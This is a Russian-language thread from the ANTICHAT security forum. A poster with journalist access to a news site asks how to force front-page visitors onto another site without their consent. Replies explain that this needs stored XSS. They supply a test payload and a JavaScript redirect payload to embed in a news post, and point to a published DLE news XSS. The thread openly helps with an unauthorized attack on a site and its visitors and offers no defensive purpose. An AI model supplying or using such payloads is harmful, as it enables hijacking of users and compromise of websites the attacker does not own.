ANTICHAT — форум по информационной безопасности, OSINT и технологиям

то что ты описал называеться активная XSS + редирект и работает только там где можеш найти активку а не на всех подряд сайтах

На том сайте где я хочу это сделать этот скрипт работал всегда. У вас его нет? Там код, он не большой по моему.....очень нужен.

Ответь в аське 298311

только для начала проверь есть ли xss вставь этот скрипт

<script>alert("XSS")</script> и уж если есть алерт то используй тот который ниже


<script>location.href='http://адрессайта'</script>

Можешь в аське ответить? А то я что-то понять не могу.

Ты меня не так понял. Я на сайте журналист, могу только новости добавлять. Дак вот надо в новость такой код чтобы если допустим новость на главной и человек зашел на главную то его сра3у перекидывало на сайт который прописан в коде.

Была на ДЛЕ активная xss в новостях, поищите в уязвимостях дле, я выкладывал

Все правильно я понял- тебе нужна активная XSS только с ней можно кидать на страници без желания юзера (если ты не админ и нет доступа чтоб код подправить в сайте)

Ну если тк че то ниче не получается то как сделать такое?
http://downloads.ru/win/2600.hts

Чтобы на главной с мои текстом выскакивало!